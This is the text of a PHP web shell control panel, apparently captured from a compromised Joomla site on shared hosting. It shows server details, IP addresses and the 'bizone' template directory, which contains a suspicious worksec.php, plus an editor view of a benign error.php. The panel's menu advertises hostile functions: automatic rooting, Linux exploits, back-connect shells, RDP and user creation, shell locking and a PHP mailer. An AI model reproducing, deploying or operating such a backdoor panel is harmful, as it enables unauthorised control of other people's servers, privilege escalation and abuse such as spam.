Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
genieprevention /
templates /
bizone /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
html
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
admin.php
5.24
KB
-rw-r--r--
component.php
1.15
KB
-rw----r--
error.php
374
B
-rw----r--
index.php
20.36
KB
-rw----r--
templateDetails.xml
5.66
KB
-rw----r--
template_preview.png
51.91
KB
-rw----r--
template_thumbnail.png
51.91
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error.php
<?php $app = JFactory::getApplication(); $doc = JFactory::getDocument(); $params = $app->getTemplate(true)->params; $page_404 = $params->get('xml_404_page',0); $menu = $app->getMenu(); $item = $menu->getItem( $page_404 ); if ($this->error->getCode() == '404' || $this->error->getCode() == '500') { $app->redirect(JRoute::_($item->link.'&Itemid='.$page_404)); exit; } ?>
Close